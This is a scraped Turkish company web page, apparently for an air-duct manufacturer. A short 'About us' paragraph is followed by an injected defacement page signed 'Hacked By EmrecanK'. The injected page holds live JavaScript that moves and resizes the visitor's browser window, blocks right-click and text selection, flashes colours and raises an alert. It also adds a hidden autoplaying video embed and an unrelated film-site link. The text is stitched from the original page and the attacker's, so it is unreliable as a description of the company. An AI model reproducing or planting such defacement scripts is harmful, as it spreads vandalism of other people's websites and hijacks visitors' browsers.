ÜRÜN KATEGORİLERİ

SAYFALAR

ÇEŞİTLİ BAĞLANTILAR

  HAKKIMIZDA

  İKG MEKANIK 2004 yılında faaliyete başlamıştır. Faaliyet konusu hava kanalı ve ekipmanları üretimidir. İKG MEKANIK topluma, müşterilerine, çalışanlarına en üst düzeyde değerler yaratmayı kendine ilke edinmiş ve bunların neler olduğunu vizyon, misyon ve kalite politikasında ortaya koymuştur. Temel değerlerimiz, yönetici ve çalışanlarımız için şirket kültürünü temsil eder.
  qwer
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  <HTML><HEAD><TITLE>EmrecanK</TITLE>
  <META http-equiv=Content-Type content="text/html; charset=utf-8">
  <META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
  <body text=#00ff00 bgColor=#000000 onload=writetext() oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
  <SCRIPT>      
  window.scrollBy(0, 1)      
  window.resizeTo(0,0)      
  window.moveTo(0,0)                
  //setInterval("move()",30);      
  setTimeout("move()", 1);      
  var mxm=100      
  var mym=50    
  var mx=0      
  var my=0      
  var sv=50      
  var status=1      
  var szx=0      
  var szy=0      
  var c=255      
  var n=0      
  var sm=30      
  var cycle=2      
  var done=2      
  function move()      
      {      
      if (status == 1)      
          {      
          mxm=mxm/1.05      
          mym=mym/1.05      
          mx=mx+mxm      
          my=my-mym      
          mxm=mxm+(400-mx)/100      
          mym=mym-(300-my)/100      
          window.moveTo(mx,my)      
          rmxm=Math.round(mxm/10)      
          rmym=Math.round(mym/10)      
          if (rmxm == 0)      
              {      
              if (rmym == 0)      
                  {      
                  status=2      
                  }      
              }      
          }      
      if (status == 2)      
          {      
          sv=sv/1.1      
          scrratio=1+1/3      
          mx=mx-sv*scrratio/2      
          my=my-sv/2      
          szx=szx+sv*scrratio      
          szy=szy+sv      
          window.moveTo(mx,my)      
          window.resizeTo(szx,szy)      
          if (sv < 0.1)      
              {      
              status=3      
              }      
          }      
      if (status == 3)      
          {      
          document.fgColor=0xffffFF      
          c=c-16       
          if (c<0)      
              {status=8}      
          }      
      if (status == 4)      
          {      
          c=c+16      
          document.bgColor=c*65536      
          document.fgColor=(255-c)*65536      
          if (c > 239)      
              {status=5}      
          }      
      if (status == 5)      
          {      
          c=c-16      
          document.bgColor=c*65536      
          document.fgColor=(255-c)*65536      
          if (c < 0)      
              {      
              status=6      
              cycle=cycle-1      
              if (cycle > 0)      
                  {      
                  if (done == 1)      
                      {status=7}      
                  else      
                      {status=4}      
                  }      
              }      
          }      
      if (status == 6)      
          {      
          document.title = "INC Team"      
          alert("INC Team")      
          cycle=2      
          status=4      
          done=1      
          }      
      if (status == 7)      
          {      
          c=c+4      
          document.bgColor=c*65536      
          document.fgColor=(255-c)*65536      
          if (c > 128)      
              {status=8}      
          }      
      if (status == 8)      
          {      
          window.moveTo(0,0)      
          sx=screen.availWidth      
          sy=screen.availHeight      
          window.resizeTo(sx,sy)      
          status=9      
  }      
      var timer=setTimeout("move()",0.3)      
      }      
  </SCRIPT>
  <center>
  <SCRIPT language=JavaScript>
          msg = new Array(); //strings written in screen
          msg[0] = "<font color='00ff00'><center><h2><u><center>..::--- Hacked By EmrecanK. ---::..</u></h2></center></font>";
          msg[1] = "<font color='00ff00'><center>*****************************************************************************?*******</center> </font><b";
          msg[2] = "   <br>";
          msg[3] = "<font color='00ff00'><center>cCc TURKEY <a href='http://www.winatom.com/'><font Face='Harrington' color='Red'> <b>cCc</b></font></a></font>";
          msg[4] = "<font color='00ff00'><center><font face='Tahoma' color='Red'>¦¦¦Emrecan.NmnDncl¦¦¦</font></center></font>";
          msg[5] = "<font size = '5' color='00ff33' ><b><center>  Was Here  </center></b></font>";
          msg[6] = "   <br>";
          
          msg[7] = "<font color='00ff00'><center>TEKBIR</center></font>";
          msg[8] = "<font color='00ff00'><center> >>>ALLAHUEKBER<<< </center></font>";
   
   
          text1  = "";    //the same as text2, only the last character is highlighted
          text2  = "";    //current string, which will be written
          count  = 0;        //char index in string text
          count2 = 0;    //number of strings
   
          text = msg[0].split(""); //text - string written
   
          function writetext() { //show strings above on screen
              text1 = text2 + "<font color='red>" + text[count] + "</font>";
              text2 += text[count];
              document.all["nothing"].innerHTML = text1; //where to write
   
              if (count < text.length-1){
                  count++;
                  setTimeout('writetext()', 25);
              }
              else { //if this string is written, get the new string
                  count = 0;
   
                  if (count2 != 8) {  //write 8 strings
                      count2++;
                      text2 += "<p>"; //a new line
                      text = eval('msg['+count2+'].split("")'); //get the new string to text
                      setTimeout('writetext()', 25);
                  }
              }
          }
      </SCRIPT>
  <FONT style="FONT-SIZE: 4pt" face="Courier New">
  <DIV align=center>
  <CENTER><TR><TD align="center" valign="middle"><FONT class=pic2ascii><BR><FONT 
  color=#000000>##1</FONT><FONT color=#808080>#</FONT><FONT 
  color=#ffffff>0</FONT><FONT color=#808080>@</FONT><FONT 
  color=#000000>0#0@101@0@0#@1@@#0#@</FONT><FONT color=#c0c0c0>1</FONT><FONT 
  color=#000000>1@#1#</FONT><BR><FONT color=#000000>01</FONT><FONT 
  color=#808080>#</FONT><FONT color=#ffffff>0</FONT><FONT 
  color=#808080>1</FONT><FONT color=#000000>0111@#1#@@###@#00##01@</FONT><FONT 
  color=#808080>#</FONT><FONT color=#000000>000@</FONT><BR><FONT 
  color=#000000>01</FONT><FONT color=#ffffff>@</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>#01@#@</FONT><FONT 
  color=#808080>0111@10#1@</FONT><FONT color=#000000>@0@010#</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>111#</FONT><BR><FONT 
  color=#000000>@</FONT><FONT color=#808080>#</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>011@#</FONT><FONT color=#808080>#</FONT><FONT 
  color=#c0c0c0>0@00@10</FONT><FONT color=#808080>0@#@</FONT><FONT 
  color=#000000>@11110</FONT><FONT color=#c0c0c0>@</FONT><FONT 
  color=#000000>@@00</FONT><BR><FONT color=#000000>0</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#ffffff>1</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>##1</FONT><FONT 
  color=#808080>01</FONT><FONT color=#c0c0c0>1@</FONT><FONT 
  color=#ffffff>1#1@</FONT><FONT color=#c0c0c0>@0#</FONT><FONT 
  color=#808080>#@1</FONT><FONT color=#000000>1</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#000000>10##</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>000@</FONT><BR><FONT 
  color=#000000>1</FONT><FONT color=#c0c0c0>@</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>1</FONT><FONT color=#000000>@</FONT><FONT 
  color=#808080>1</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>0</FONT><FONT color=#c0c0c0>#</FONT><FONT 
  color=#ffffff>#@0#1@</FONT><FONT color=#c0c0c0>1#@</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>@</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>1@</FONT><FONT color=#c0c0c0>10</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>@100</FONT><BR><FONT 
  color=#000000>0</FONT><FONT color=#808080>#</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>@#</FONT><FONT color=#000000>@</FONT><FONT 
  color=#808080>#</FONT><FONT color=#c0c0c0>##</FONT><FONT 
  color=#ffffff>@#1@1@@</FONT><FONT color=#c0c0c0>@@</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>0</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT 
  color=#808080>0</FONT><FONT color=#c0c0c0>#@0</FONT><FONT 
  color=#000000>110@0</FONT><BR><FONT color=#000000>@0</FONT><FONT 
  color=#c0c0c0>00</FONT><FONT color=#808080>@1</FONT><FONT 
  color=#000000>@</FONT><FONT color=#808080>0</FONT><FONT 
  color=#c0c0c0>01</FONT><FONT color=#ffffff>###@1##</FONT><FONT 
  color=#c0c0c0>@0@</FONT><FONT color=#808080>#</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT 
  color=#c0c0c0>10@</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>01@11</FONT><BR><FONT color=#000000>1#1</FONT><FONT 
  color=#808080>1@</FONT><FONT color=#000000>#@</FONT><FONT 
  color=#808080>1</FONT><FONT color=#c0c0c0>11</FONT><FONT 
  color=#ffffff>11@0#1#</FONT><FONT color=#c0c0c0>@1@</FONT><FONT 
  color=#808080>@1</FONT><FONT color=#000000>##</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT 
  color=#000000>@00</FONT><BR><FONT color=#000000>#@</FONT><FONT 
  color=#808080>#</FONT><FONT color=#000000>#11</FONT><FONT 
  color=#808080>00</FONT><FONT color=#c0c0c0>@#</FONT><FONT 
  color=#ffffff>1#0##10</FONT><FONT color=#c0c0c0>0#0</FONT><FONT 
  color=#808080>10</FONT><FONT color=#000000>1@@@0#</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>101</FONT><BR><FONT 
  color=#000000>#@0</FONT><FONT color=#808080>10#@</FONT><FONT 
  color=#c0c0c0>@01#</FONT><FONT color=#ffffff>#100@@</FONT><FONT 
  color=#c0c0c0>##0</FONT><FONT color=#808080>###</FONT><FONT 
  color=#000000>11#0@#001</FONT><BR><FONT color=#000000>#0</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT 
  color=#808080>0</FONT><FONT color=#c0c0c0>00#</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT 
  color=#ffffff>@0@#</FONT><FONT color=#c0c0c0>00@</FONT><FONT 
  color=#808080>#0</FONT><FONT color=#000000>##@@#@</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#000000>@1#0</FONT><BR><FONT 
  color=#000000>#0</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#000000>#</FONT><FONT color=#808080>1</FONT><FONT 
  color=#c0c0c0>@#</FONT><FONT color=#ffffff>1@</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>@</FONT><FONT 
  color=#c0c0c0>@0</FONT><FONT color=#ffffff>##1</FONT><FONT 
  color=#c0c0c0>@1</FONT><FONT color=#808080>#@</FONT><FONT 
  color=#c0c0c0>#0#</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>1##00#@@</FONT><BR><FONT color=#000000>#11#</FONT><FONT 
  color=#808080>0</FONT><FONT color=#c0c0c0>@</FONT><FONT 
  color=#ffffff>0#1@</FONT><FONT color=#c0c0c0>1</FONT><FONT 
  color=#808080>1</FONT><FONT color=#c0c0c0>@11#@</FONT><FONT 
  color=#808080>#0</FONT><FONT color=#c0c0c0>11@1@</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>10#0000</FONT><BR><FONT 
  color=#000000>1@@#0</FONT><FONT color=#ffffff>#</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#808080>0@</FONT><FONT 
  color=#c0c0c0>##011@1#</FONT><FONT color=#808080>#</FONT><FONT 
  color=#c0c0c0>##0</FONT><FONT color=#808080>@01@0</FONT><FONT 
  color=#000000>0011#0</FONT><BR><FONT color=#000000>1#</FONT><FONT 
  color=#808080>@</FONT><FONT color=#000000>##</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>#</FONT><FONT 
  color=#000000>1#0#</FONT><FONT color=#c0c0c0>#</FONT><FONT 
  color=#808080>1#</FONT><FONT color=#c0c0c0>@#</FONT><FONT 
  color=#000000>@</FONT><FONT color=#c0c0c0>0#1</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>@1@@#1#0@@0</FONT><BR><FONT 
  color=#000000>1#</FONT><FONT color=#808080>00</FONT><FONT 
  color=#000000>1</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>0</FONT><FONT color=#ff0000>1#0</FONT><FONT 
  color=#000000>#@</FONT><FONT color=#808080>10</FONT><FONT 
  color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT 
  color=#000000>#</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>11</FONT><FONT 
  color=#ff0000>1##</FONT><FONT color=#000000>0@@#0#@1</FONT><BR><FONT 
  color=#000000>11</FONT><FONT color=#808080>1</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#808080>00</FONT><FONT 
  color=#000000>@</FONT><FONT color=#ff0000>0@01</FONT><FONT 
  color=#000000>0@1@0@</FONT><FONT color=#808080>@</FONT><FONT 
  color=#000000>10</FONT><FONT color=#ff0000>0111</FONT><FONT 
  color=#000000>##@0@#0@</FONT><BR><FONT color=#000000>#0</FONT><FONT 
  color=#808080>1</FONT><FONT color=#ffffff>@</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>11</FONT><FONT color=#ff0000>11#</FONT><FONT 
  color=#000000>1##@0@#@1</FONT><FONT color=#ff0000>###</FONT><FONT 
  color=#000000>@0#</FONT><FONT color=#808080>@</FONT><FONT 
  color=#000000>00@#@</FONT><BR><FONT color=#000000>@@0</FONT><FONT 
  color=#c0c0c0>1</FONT><FONT color=#ffffff>#</FONT><FONT 
  color=#c0c0c0>0@</FONT><FONT color=#000000>1@0@@##1</FONT><FONT 
  color=#808080>@#</FONT><FONT color=#000000>@@@@1</FONT><FONT 
  color=#808080>@#00</FONT><FONT color=#000000>@00@01</FONT><BR><FONT 
  color=#000000>10@</FONT><FONT color=#c0c0c0>##</FONT><FONT 
  color=#ffffff>1@0@</FONT><FONT color=#c0c0c0>0</FONT><FONT 
  color=#808080>#@</FONT><FONT color=#000000>@#</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>#0</FONT><FONT color=#808080>1010#</FONT><FONT 
  color=#000000>0101@0#</FONT><BR><FONT color=#000000>0@01</FONT><FONT 
  color=#808080>100</FONT><FONT color=#c0c0c0>111</FONT><FONT 
  color=#808080>@0#@</FONT><FONT color=#ffffff>01</FONT><FONT 
  color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT 
  color=#808080>1</FONT><FONT color=#000000>#10@#0@#0##@@</FONT><BR><FONT 
  color=#000000>0100#0</FONT><FONT color=#808080>110@@</FONT><FONT 
  color=#c0c0c0>1</FONT><FONT color=#808080>#</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#ffffff>0</FONT><FONT 
  color=#808080>#</FONT><FONT color=#000000>@</FONT><FONT 
  color=#808080>01</FONT><FONT color=#000000>#1@#000@101@0</FONT><BR><FONT 
  color=#000000>01@1@1#@01</FONT><FONT color=#808080>@</FONT><FONT 
  color=#c0c0c0>110#</FONT><FONT color=#000000>@11</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>@1@0@#000@#0#</FONT><BR><FONT 
  color=#000000>##@0##1@@#</FONT><FONT color=#808080>#</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#c0c0c0>0@@</FONT><FONT 
  color=#000000>0@#</FONT><FONT color=#808080>#</FONT><FONT 
  color=#000000>0110@#001@10#</FONT><BR><FONT color=#000000>#01@00@#@@</FONT><FONT 
  color=#808080>@</FONT><FONT color=#ffffff>1@#</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT 
  color=#ffffff>0</FONT><FONT color=#000000>1</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>01@</FONT><FONT 
  color=#808080>1</FONT><FONT color=#000000>10@01@##0</FONT><BR><FONT 
  color=#000000>@##11010</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>@</FONT><FONT color=#c0c0c0>0@#</FONT><FONT 
  color=#ffffff>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT 
  color=#ffffff>1</FONT><FONT color=#c0c0c0>@0</FONT><FONT 
  color=#000000>@</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT 
  color=#000000>#@101#0#1</FONT><BR><FONT color=#000000>11@@#1@@</FONT><FONT 
  color=#808080>1</FONT><FONT color=#000000>#</FONT><FONT 
  color=#c0c0c0>#@1</FONT><FONT color=#808080>@</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#ffffff>@</FONT><FONT 
  color=#c0c0c0>1</FONT><FONT color=#ffffff>@</FONT><FONT 
  color=#c0c0c0>@0</FONT><FONT color=#808080>1</FONT><FONT 
  color=#000000>#1#11111@00</FONT><BR><FONT color=#000000>10#@1001@@</FONT><FONT 
  color=#c0c0c0>#</FONT><FONT color=#ffffff>1</FONT><FONT 
  color=#808080>#</FONT><FONT color=#c0c0c0>0#@1</FONT><FONT 
  color=#ffffff>0</FONT><FONT color=#c0c0c0>#1</FONT><FONT 
  color=#808080>#</FONT><FONT color=#000000>11@101##011</FONT><BR><FONT 
  color=#000000>@#@01@0#0#</FONT><FONT color=#808080>1</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#000000>1</FONT><FONT 
  color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT 
  color=#ffffff>@</FONT><FONT color=#c0c0c0>#</FONT><FONT 
  color=#808080>0</FONT><FONT color=#000000>@@@@00100@11</FONT><BR><FONT 
  color=#000000>@@0#@#1@0#10@</FONT><FONT color=#808080>@</FONT><FONT 
  color=#c0c0c0>0#</FONT><FONT color=#000000>1</FONT><FONT 
  color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT 
  color=#000000>##11111#010@0</FONT><BR><FONT 
  color=#000000>1@#0#1@010@#011@1@#@0000101@#0@0</FONT></FONT></TD></TR></CENTER></FONT></DIV></FONT>
   
  <CENTER><SPAN style="FONT-WEIGHT: 200"></SPAN></CENTER>
  <TABLE align=center>
    <DIV id=nothing 
    style="FONT-WEIGHT: bold; WIDTH: 800px; FONT-FAMILY: 'courier new'; HEIGHT: 540px"></DIV>
    <TBODY></TBODY></TABLE>
  <SCRIPT language=JavaScript> 
          if (document.all){
              Cols = 9;            //number of falldown binary string
              Cl   = 50;            //maximum length of binary string
              Cs   = 100;            //number of pixels between binary strings
              Ts   = 10;            //font-size of binary string
              Tc   = '#008800';    //color of binary string
              Tc1  = '#00ff00';    //color of 1st bit in binary string
              MnS  = 22;            //minimum speed of binary string
              MxS  = 25;            //maximum spees of binary string
              I    = Cs;
   
              Sp  = new Array();                        //array speed of binary strings
              S   = new Array();                      //the position of binary string
              Y   = new Array();                        //array of position of binary strings
              C   = new Array();                        //array save bits of string
              M   = new Array();                      //binary string
              B   = new Array();                        //temp for creating binary string
              RC  = new Array();                        //length of binary strings
              E   = new Array();                        //array of head-bit in written strings
              Tcc = new Array(0,1,2,3,4,5,6,7,8,9);    //array of head-bit in binary strings
   
              document.write("<div id='Container' style='position:absolute; top:0; left:-"+Cs+"'>");
   
              for (i=0; i < Cols; i++){    //area to show binary strings
                  S[i] = I += Cs;            //calculate the position of binary string
                  document.write("<div id='A' style='position:absolute; top:0; font-family:Arial;" +
                                  "font-size:" + Ts + "px; left:" + S[i] + "; width:" + Ts + "px;" +
                                  "height:0px; color:" + Tc + "; visibility:hidden'></div>");
              }
              document.write("</div>");
          }
   
          for(j = 0; j < Cols; j++){
              RC[j] = 1 + Math.round(Math.random()*Cl);    //random length of the binary strings
              for(i=0; i < RC[j]; i++){
                  B[i] = "";                                //sign of ending of string
                  C[i] = Math.round(Math.random())+' ';    //get bit in binary strings
                  B[0] += C[i];
              }
              M[j] = B[0];                                //binary string
              Y[j] = 0;                                     //1st position of strings are 0
              Sp[j] = Math.round(MnS+Math.random()*MxS);    //random speed of binary strings
          }
   
          function Cycle(){
              Container.style.top = window.document.body.scrollTop;
              for (i=0; i < Cols; i++){
                  var r = Math.floor(Math.random()*Tcc.length);        //get a position in table Tcc
                  E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>';        //get the head-bit
                  Y[i]+=Sp[i];                                        //the position of current string
                  if (Y[i] > window.document.body.clientHeight) {        //if at the end of window, calculate again
                      i2 = 1 + Math.round(Math.random()*Cols);
                      RC[i2] = 1 + Math.round(Math.random()*Cl);
                      for(i3 = 0; i3 < RC[i2]; i3++){                    //get bit in binary strings
                          B[i3] = "";
                          C[i3] = Math.round(Math.random())+' ';
                          B[0] += C[i3];
                      }
                      M[i] = B[0];
                      Y[i] = -Ts*M[i].length/1.5;                        //hide 2/3 string at beginning
                      Sp[i] = Math.round(MnS+Math.random()*MxS);        //random speed of binary strings
                      A[i].style.visibility = 'visible';
                  }
                  A[i].style.top=Y[i];                                //the i-th in tag div A
                  A[i].innerHTML=M[i] + ' ' + E[i];                    //show the binary string in tag A
              }
              setTimeout('Cycle()',100)
          }
   
          Cycle();
  </SCRIPT>
   
   
  <embed width="0" height="0" src="http://www.youtube.com/v/6TFHhqb6CFE&autoplay=1&amp;loadingcolor=000000&amp;slidercolo"></p>
   
  Baklacı Mh. Çavuşbaşı Cumhuriyet Cd. No:5/2 Beykoz

  www.fulhdfilm.com

  0(216) 429 61 95